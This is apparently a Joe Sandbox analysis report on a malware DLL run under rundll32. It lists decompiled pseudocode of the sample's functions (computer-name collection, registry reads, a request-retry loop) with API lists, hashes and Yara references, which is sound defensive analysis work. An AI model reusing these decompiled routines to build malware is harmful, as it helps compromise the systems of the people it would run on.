                                • SysAllocString.OLEAUT32(04A44BD8), ref: 04A48ABA
                                • SysFreeString.OLEAUT32(00000000), ref: 04A48ACE
                                • SysFreeString.OLEAUT32(00000000), ref: 04A48ADC
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 2943944cabac1a9af107c43f3587ad1750855ac349d7322591118541dde9db20
                                • Instruction ID: 8626c94304ba7197fb124b8310313f2e794cf88b0d9de03f81d32b776d14b84e
                                • Opcode Fuzzy Hash: 2943944cabac1a9af107c43f3587ad1750855ac349d7322591118541dde9db20
                                • Instruction Fuzzy Hash: 74311D79900209EFDB05DF98E8809AE7BB9FFD8310B61842EF506DB250E775A941CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A45B05, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memorytimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04A45B05(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E04A47B3B(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E04A42D2E(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E04A4A38F(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x4a4d238, 0, _t25);
				}
				return _t22;
			}











                                0x04a45b05
                                0x04a45b16
                                0x04a45b1a
                                0x04a45b75
                                0x04a45b1c
                                0x04a45b23
                                0x04a45b2b
                                0x04a45b2e
                                0x04a45b33
                                0x04a45b37
                                0x04a45b3d
                                0x04a45b45
                                0x04a45b48
                                0x04a45b60
                                0x04a45b60
                                0x04a45b6b
                                0x04a45b6b
                                0x04a45b7c

                                APIs
                                  • Part of subcall function 04A47B3B: lstrlen.KERNEL32(?,00000000,04E59D18,00000000,04A45142,04E59F3B,?,?,?,?,?,69B25F44,00000005,04A4D00C), ref: 04A47B42
                                  • Part of subcall function 04A47B3B: mbstowcs.NTDLL ref: 04A47B6B
                                  • Part of subcall function 04A47B3B: memset.NTDLL ref: 04A47B7D
                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04E5935C), ref: 04A45B3D
                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04E5935C), ref: 04A45B6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                • String ID: Ut
                                • API String ID: 1500278894-8415677
                                • Opcode ID: 9616996d200a29f190215866f159ead86a5479d28bc3cbcd7a67a8286476d228
                                • Instruction ID: 2f28e6ebb918d3e1cc7a102e5d9d96b4d2da0a55b8b40cc35915944286605ad4
                                • Opcode Fuzzy Hash: 9616996d200a29f190215866f159ead86a5479d28bc3cbcd7a67a8286476d228
                                • Instruction Fuzzy Hash: 0101A23A600209BBEB216FA4DC44F9F7BB9EFC4754F004029FA049A1A0EB72E956C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A44A2A, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                Download Yara Rule
                                C-Code - Quality: 47%
                                			E04A44A2A(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E04A41525(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x4a4c284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                0x04a44a2e
                                0x04a44a3b
                                0x04a44a3d
                                0x04a44a3e
                                0x04a44a46
                                0x04a44a46
                                0x04a44a4a
                                0x00000000
                                0x00000000
                                0x04a44a41
                                0x04a44a42
                                0x04a44a45
                                0x04a44a45
                                0x04a44a52
                                0x04a44a57
                                0x04a44a5c
                                0x04a44a64
                                0x04a44a6a
                                0x04a44a6c
                                0x04a44a6f
                                0x04a44a73
                                0x04a44a75
                                0x04a44a78
                                0x04a44a78
                                0x04a44a79
                                0x04a44a7b
                                0x04a44a78
                                0x04a44a85
                                0x04a44a88
                                0x04a44a8b
                                0x04a44a8c
                                0x04a44a8e
                                0x04a44a95
                                0x04a44a95
                                0x04a44aa1

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,04E595AC,04A430F3,?,04A41173,?,04E595AC,?,04A430F3), ref: 04A44A46
                                • StrTrimA.SHLWAPI(?,04A4C284,00000002,?,04A41173,?,04E595AC,?,04A430F3), ref: 04A44A64
                                • StrChrA.SHLWAPI(?,00000020,?,04A41173,?,04E595AC,?,04A430F3), ref: 04A44A6F
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: 2287ef81fc6bb8eee3f422a4eb6090d324ebb6cbafbf6e4edcf6278a8ddd6ec1
                                • Instruction ID: 1ed0b0c897228e091a080e0f3c6e0292f1f68252449645646e66f797d7aec2bc
                                • Opcode Fuzzy Hash: 2287ef81fc6bb8eee3f422a4eb6090d324ebb6cbafbf6e4edcf6278a8ddd6ec1
                                • Instruction Fuzzy Hash: 7E018F723003066FE7205F6A9C48F6F7B9DEBC9754F955021B945CB2C2DA74E8428764
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A48B22, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04A48B22(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x4a4d238, 0, _a4); // executed
				return _t2;
			}




                                0x04a48b2e
                                0x04a48b34

                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: 118a00ae6e82923b5ff671ccca8787e5d87fb97ab7ff865ac5500bb25eae7811
                                • Instruction ID: fa29c85493235b080aecb97e0d2e276b619fc5b94fd147a4bb63f46c7d8d6fb8
                                • Opcode Fuzzy Hash: 118a00ae6e82923b5ff671ccca8787e5d87fb97ab7ff865ac5500bb25eae7811
                                • Instruction Fuzzy Hash: 1DB01279100100ABEB114F50DE04F0DFA21EBF0700F014010F3080807087374C22FB15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A476E7, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E04A476E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04A48A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4a4d2a8; // 0x40a5a8
						_t20 = _t68 + 0x4a4e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04A4A6BC(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                0x04a476ed
                                0x04a476f0
                                0x04a47700
                                0x04a47709
                                0x04a4770d
                                0x04a477db
                                0x04a477e1
                                0x04a477e1
                                0x04a47727
                                0x04a4772c
                                0x04a47730
                                0x04a47736
                                0x04a4773b
                                0x04a47742
                                0x04a47751
                                0x04a47751
                                0x04a47755
                                0x04a47757
                                0x04a47763
                                0x04a4776e
                                0x04a47779
                                0x04a4777d
                                0x04a47787
                                0x04a4778b
                                0x04a4778d
                                0x04a47792
                                0x04a47799
                                0x04a477a9
                                0x04a477a9
                                0x04a47792
                                0x04a4778b
                                0x04a477ab
                                0x04a477b0
                                0x04a477b5
                                0x04a477b5
                                0x04a477b8
                                0x04a477c1
                                0x04a477c6
                                0x04a477c6
                                0x04a477cb
                                0x04a477d0
                                0x04a477d0
                                0x04a477cb
                                0x04a47755
                                0x04a477d2
                                0x04a477d8
                                0x00000000

                                APIs
                                  • Part of subcall function 04A48A19: SysAllocString.OLEAUT32(80000002), ref: 04A48A76
                                  • Part of subcall function 04A48A19: SysFreeString.OLEAUT32(00000000), ref: 04A48ADC
                                • SysFreeString.OLEAUT32(?), ref: 04A477C6
                                • SysFreeString.OLEAUT32(04A44BD8), ref: 04A477D0
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 67cfae7a96253aaf3b3ad1f6d728ffbffad14b28ffba9e6d2ae63db0a15a481f
                                • Instruction ID: 45e300e8efd8d9a8092ba6c41c485f70ccb10ca8e8b87b3702836c59a2225f51
                                • Opcode Fuzzy Hash: 67cfae7a96253aaf3b3ad1f6d728ffbffad14b28ffba9e6d2ae63db0a15a481f
                                • Instruction Fuzzy Hash: 643148BA500158AFDB11DF98C888C9FBB79FFC97407558658F8159B220E372ED52CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A44ABF, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(04A45C8D), ref: 04A44AD8
                                  • Part of subcall function 04A476E7: SysFreeString.OLEAUT32(?), ref: 04A477C6
                                • SysFreeString.OLEAUT32(00000000), ref: 04A44B19
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 00e3f5cc74a550ca815749b7d848a627512a8703ef14ddddd1ddc70241d2c09a
                                • Instruction ID: fecbc6baff7e7ddb70349a691eba8dd8f65a60191b6446b6120e78ba4efb2196
                                • Opcode Fuzzy Hash: 00e3f5cc74a550ca815749b7d848a627512a8703ef14ddddd1ddc70241d2c09a
                                • Instruction Fuzzy Hash: BD016275511109BFDB419FA8D804EAFBBB9FFD8710B014021F908E7120D7319D16CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A45D79, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04A45D79(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E04A47DDD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x4a4d238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E04A41037(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                0x04a45d79
                                0x04a45d81
                                0x04a45d98
                                0x04a45db3
                                0x04a45db7
                                0x04a45dbc
                                0x04a45dbe
                                0x04a45dd0
                                0x04a45ddc
                                0x04a45dc0
                                0x04a45dc0
                                0x04a45dc5
                                0x04a45dca
                                0x04a45dca
                                0x04a45dbe
                                0x04a45de2
                                0x04a45de6
                                0x04a45de6
                                0x04a45d8d
                                0x04a45d92
                                0x04a45d96
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                  • Part of subcall function 04A41037: SysFreeString.OLEAUT32(00000000), ref: 04A4109A
                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,04A45356,?,004F0053,04E59368,00000000,?), ref: 04A45DDC
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Free$HeapString
                                • String ID: Ut
                                • API String ID: 3806048269-8415677
                                • Opcode ID: 3b250d31ef84c65eaf73e3d994355cd310d8a256b889be605d316510a39aaec5
                                • Instruction ID: f405d5f31170bf5036c52a53d6d14ba877a9bfe8a9cbcac50ff70c7199b6c11e
                                • Opcode Fuzzy Hash: 3b250d31ef84c65eaf73e3d994355cd310d8a256b889be605d316510a39aaec5
                                • Instruction Fuzzy Hash: CF014632500619BBDB22DF54CC08FEE7BA5EFD8790F048029FE099A120D732E961DB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A4831C, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E04A4831C(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04A41525(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04A48B22(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                0x04a48321
                                0x04a4832c
                                0x04a4832e
                                0x04a48334
                                0x04a48336
                                0x04a4833b
                                0x04a48344
                                0x04a48348
                                0x04a48351
                                0x04a48355
                                0x04a48364
                                0x04a48357
                                0x04a48358
                                0x04a4835d
                                0x04a4835d
                                0x04a48355
                                0x04a48348
                                0x04a4836d

                                APIs
                                • GetComputerNameExA.KERNEL32(00000003,00000000,04A49C7E,74E5F710,00000000,?,?,04A49C7E), ref: 04A48334
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • GetComputerNameExA.KERNEL32(00000003,00000000,04A49C7E,04A49C7F,?,?,04A49C7E), ref: 04A48351
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: ComputerHeapName$AllocateFree
                                • String ID:
                                • API String ID: 187446995-0
                                • Opcode ID: bdcac344ebb51329486160f1bc26ee0a4755623e3871fde9d11ce61c1d237a32
                                • Instruction ID: 0ac4e5ff7e391731c62c8e6c90167677f2f4c7df07772c6741386e6d81232819
                                • Opcode Fuzzy Hash: bdcac344ebb51329486160f1bc26ee0a4755623e3871fde9d11ce61c1d237a32
                                • Instruction Fuzzy Hash: 26F0307A600205AEEB21E69A9D04EEF66BCEBC5750F111059A504E3140EA74FE029660
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A47EFD, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x4a4d23c) == 0) {
						E04A44DB1();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x4a4d23c) == 1) {
						_t10 = E04A42789(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                0x04a47f04
                                0x04a47f05
                                0x04a47f08
                                0x04a47f3a
                                0x04a47f3c
                                0x04a47f3c
                                0x04a47f0a
                                0x04a47f0b
                                0x04a47f20
                                0x04a47f27
                                0x04a47f29
                                0x04a47f29
                                0x04a47f27
                                0x04a47f0b
                                0x04a47f44

                                APIs
                                • InterlockedIncrement.KERNEL32(04A4D23C), ref: 04A47F12
                                  • Part of subcall function 04A42789: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,04A47F25,?), ref: 04A4279C
                                • InterlockedDecrement.KERNEL32(04A4D23C), ref: 04A47F32
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: d7f791ca66066f2600ddc36e9eceb7e2502ffb9c64c0a43971e39d91f5bf782c
                                • Instruction ID: ab82fd7ae7a076696beeaa715b87715b1fdad30991b4d1322eefd4b42b8124b6
                                • Opcode Fuzzy Hash: d7f791ca66066f2600ddc36e9eceb7e2502ffb9c64c0a43971e39d91f5bf782c
                                • Instruction Fuzzy Hash: A9E08C393081B2A3AB216BB49848B6EA650ABE0BD5F22D454F886D10D0D722F851D6F1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A4933A, Relevance: 1.6, APIs: 1, Instructions: 70synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04A4933A(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x4a4d2c8; // 0x4e59618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E04A48C01( &_v68) == 0) {
						goto L16;
					}
					_t30 = E04A497F7(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E04A45988(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E04A4D000 = E04A4D000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E04A458DB( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x4a4d26c, 0) == 0x102);
				return _t30;
			}

















                                0x04a4933a
                                0x04a49340
                                0x04a49347
                                0x04a4934f
                                0x04a49355
                                0x04a49358
                                0x04a4935a
                                0x04a4935a
                                0x04a49362
                                0x04a49362
                                0x04a4936c
                                0x00000000
                                0x00000000
                                0x04a4937b
                                0x04a4937f
                                0x04a49383
                                0x04a49388
                                0x04a4938c
                                0x04a493c8
                                0x04a493ca
                                0x04a493ca
                                0x04a4938e
                                0x04a49395
                                0x04a493bf
                                0x04a49397
                                0x04a49397
                                0x04a4939c
                                0x04a493b8
                                0x04a4939e
                                0x04a4939e
                                0x04a493a3
                                0x04a493a8
                                0x04a493ab
                                0x04a493ad
                                0x04a493b2
                                0x04a493b4
                                0x04a493b4
                                0x04a493b2
                                0x04a493a3
                                0x04a4939c
                                0x04a49395
                                0x04a4938c
                                0x04a493d7
                                0x04a493dc
                                0x04a493dc
                                0x04a49400

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 04A493EC
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID:
                                • API String ID: 24740636-0
                                • Opcode ID: 4cae19feeb52574531c520bb4194975ad0b2f04b0a7e4b680532dbae3a8a8204
                                • Instruction ID: 7d9113af95fe3a375eaa133016453d76bf555360999d0ed3b1054ca4117446e0
                                • Opcode Fuzzy Hash: 4cae19feeb52574531c520bb4194975ad0b2f04b0a7e4b680532dbae3a8a8204
                                • Instruction Fuzzy Hash: 6F219DB67002099BEF11DF69D854AAF77B9ABC2364F10402DE505AB2E0DB75FC22C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A41037, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                Download Yara Rule
                                C-Code - Quality: 34%
                                			E04A41037(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4a4d2a8; // 0x40a5a8
				_t4 = _t15 + 0x4a4e39c; // 0x4e58944
				_t20 = _t4;
				_t6 = _t15 + 0x4a4e124; // 0x650047
				_t17 = E04A476E7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E04A47EA4(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                0x04a41041
                                0x04a41048
                                0x04a41049
                                0x04a4104a
                                0x04a4104b
                                0x04a41051
                                0x04a41056
                                0x04a41056
                                0x04a41060
                                0x04a41072
                                0x04a41079
                                0x04a410a7
                                0x04a4107b
                                0x04a4107d
                                0x04a41082
                                0x04a410a4
                                0x04a41084
                                0x04a41087
                                0x04a4108e
                                0x04a41093
                                0x04a41095
                                0x04a41095
                                0x04a4109a
                                0x04a4109a
                                0x04a41082
                                0x04a410ae

                                APIs
